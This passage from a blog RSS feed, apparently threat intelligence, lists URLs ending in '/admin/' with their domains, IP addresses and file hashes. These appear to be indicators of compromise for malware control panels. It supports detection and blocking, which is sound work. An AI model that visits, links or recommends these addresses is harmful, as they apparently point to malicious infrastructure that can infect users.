35d727cf1e8dfc74d81043536f458840</p></blockquote>
<blockquote><p>http://apple-shop.tech/Gtf7xfRd3bnj/admin/<br />
apple-shop.tech<br />
37.1.201.91<br />
8b6f7b420072d95e8da65df7f4aa1b5d</p></blockquote>
<blockquote><p>http://bima.website/admin/<br />
bima.website<br />
185.241.55.242<br />
3a2534afc6e50555e18d34030a356f94</p></blockquote>
<blockquote><p>http://cynagotceter.in/q2/admin/<br />
cynagotceter.in<br />
49.51.230.174<br />
e6bbc52ff5f1ca8d5a705e16db96797d<br />
8bbffeabfce5932a31349333c3b13929<br />
1350d30aa6e02baa48af3411646d55e5</p></blockquote>
<blockquote><p>http://dackdack.online/api2/admin/<br />
dackdack.online<br />
104.168.140.87<br />
45.79.218.235<br />
206.189.77.19<br />
431c3a0f52955313121038dcc8b8f021<br />
ca9d18db1dfc3ad5a52402525ce0e52b<br />
04ce2ca848782de8278340787af03e6b<br />
e282e93caffd4affd50096bb4f009b31<br />
ceb24f0dfd5867c59c292cd6eef9d4dd</p></blockquote>
<blockquote><p>http://dada.grantflaskparty.com/admin/<br />
dada.grantflaskparty.com<br />
185.148.147.152<br />
bdb58831b33c3d3009490d16ff520386<br />
734d0a1cf0c233f1a30865c6c5a2d9b3<br />
3f7625566c2f3a35acfd7a14642e1bbd<br />
21cbba5bda95d96313881378d250f08e<br />
013f456bac4268047d917236a2ff262f<br />
e996e9b252991d87e6908bb3beddb393</p></blockquote>
<blockquote><p>http://dandiesinoz.com/scripts/backup/admin/<br />
dandiesinoz.com<br />
116.0.23.244<br />
a22c6aa5c0c470f2130720d0a1a4ad7c</p></blockquote>
<blockquote><p>http://data.michaelorth.eu/q/admin/<br />
data.michaelorth.eu<br />
194.58.119.193<br />
32ee820b1a32b23ad95cbff42790821a<br />
ac8de3d1d37e9cea76deb8bea8149f65<br />
c140241e3d820d7bd9a132c5f83e99bf<br />
10e8ea5b0391319f5a2794cd0f634624<br />
456c88705ef023d28327f7d1a86b81f3<br />
2eef86c9a85199249ecc5a867fd86390<br />
a384f4f75c88de6dd7f8533a5c400843<br />
9b29ab7418e2d09893b9c0c66760b554<br />
03175a6b6691964c2ed1bf123fb2d0ba<br />
4030b46d23eb1f00abb09d8c42f18a0c<br />
269870263ec4e37684da241752f4b5d7<br />
9bab405d34afa66fba19ec044dee3174<br />
8df4e1260345f6d54d1963b95820deda<br />
3316d264fa5a13cf6cf8ce6a71b0055d<br />
22502e23ca6970cb0571b56f69c37a65<br />
1e0ed91b51897400a4ca65b35f6ded5b<br />
913a742cf8f822e36702b728688aa692<br />
79536b1ecd2e4b91ac771553f74fefe1<br />
b663605f5ee5934f2adc45d768ac80ff<br />
1d84da6610ac43dc7112168fb406fb22<br />
1cc936f7c244ea822178b5a3c4ff3c7c<br />
90e31c2c541294836c227f8daa19125a<br />
58d3799f25096d766eda4f28066a93a9<br />
b41d1d1c60ca99c85906ca75a0ff3fa5<br />
10c02a83ac93a708b2c631b7fa5a559b<br />
1a22573774c891fc4f86a99f45dbc809<br />
64ff0ccf4a668c683ff3715116267c41<br />
467f40798700f10e8cbd9d482ad4dc9a<br />
b32803bfe5626409995a1300de76a700<br />
34a3e10080caefd4787334d2d438249b<br />
11912cd4ce45e06c1559802b66a77489<br />
58ef78d8b51caeb750ab10fd56197f79</p></blockquote>
<blockquote><p>http://dnspod.pro/pro/admin/<br />
dnspod.pro<br />
185.117.119.29<br />
588eace9102a9f67ef2a1f24322cc5b0</p></blockquote>
<blockquote><p>http://fortresmuch.com/q2/admin/<br />
fortresmuch.com<br />
119.28.111.49<br />
cf8165ddc1ce44835cb57ec226c08c4d<br />
07da5d3088a13d4db7d5300e84b11ca4</p></blockquote>
<blockquote><p>http://heroskatopirango.com/391f4jda9s/a/admin/<br />
heroskatopirango.com<br />
204.155.30.106<br />
0942974fbe31b4be3e12dd6d65f85478</p></blockquote>
<blockquote><p>http://javelinkay.club/reader/admin/<br />
javelinkay.club<br />
49.51.135.204<br />
6955ed0b43b3a5d33a1d9daf1f482923</p></blockquote>
<blockquote><p>http://login.americapsolutions.com/q/admin/<br />
login.americapsolutions.com<br />
194.58.119.193<br />
595eaef63066c95296fad6f0fe9ee41a</p></blockquote>
<blockquote><p>http://mts2015stm.myjino.ru/q/admin/<br />
mts2015stm.myjino.ru<br />
81.177.135.151<br />
88a0c0fcee3e8f46766dd25ce70c11b9<br />
47bb80b54e11d0ce1dc3179b46414cac</p></blockquote>
<blockquote><p>http://myyu.ru/q/admin/<br />
myyu.ru<br />
95.46.114.96<br />
a263ad4e55c797fa551ca9f9c576ff48<br />
ab87aa8d0818c6c9f99794f6c93f6d36</p></blockquote>
<blockquote><p>http://newdawncheat.club/q/admin/<br />
newdawncheat.club<br />
191.101.245.36<br />
0d0838e8c347d6f71c48bd3316cb0103</p></blockquote>
<blockquote><p>http://rec-tube.date/carting/admin/<br />
rec-tube.date<br />
191.101.245.46<br />
ce9c9edab5b8fc2905e90613a092a808</p></blockquote>
<blockquote><p>http://rolwiluld.win/q/admin/<br />
rolwiluld.win<br />
194.1.236.115<br />
dc3cb327730bd9ce48c6303bcb768b9c<br />
d54b25a98667215ae3958160f3ebd76d<br />
186b0653e11b870bdd173d8fa0d214ca<br />
e1468b0743822bed071274f0d2e7384f</p></blockquote>
<blockquote><p>http://serolotb.com/q/admin/<br />
serolotb.com<br />
185.117.75.92<br />
0370e27514bfd6282b5708b5b01b893d</p></blockquote>
<blockquote><p>http://tytoldran.win/q/admin/<br />
tytoldran.win<br />
194.1.236.115<br />
ed6f9b51cd3dd3d5cf2a9011c67b204b<br />
4fcab10c59be02cc0a50e2c280247ff0<br />
432b18e36bfd91dad68edfba581ef3ed<br />
0d1ce7055e828bbedd5be16e75841fed</p></blockquote>
<blockquote><p>http://warpje.xyz/quant/admin/<br />
warpje.xyz<br />
37.97.183.120<br />
438b06bfd279e7430d3a9a62246c93a6</p></blockquote>
<blockquote><p>http://wassronledorhad.in/q2/admin/<br />
wassronledorhad.in<br />
45.32.236.220<br />
e6e2025afee1679005a94438c924f58c</p></blockquote>
<blockquote><p>http://windowsreport.stream/q/admin/<br />
windowsreport.stream<br />
104.24.114.159<br />
c639b0b9ee0407051fc656a28f2b0e97<br />
98b94529813f27aafce8818b49288397<br />
54e6ab371b04161963c793796d90bc37</p></blockquote>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
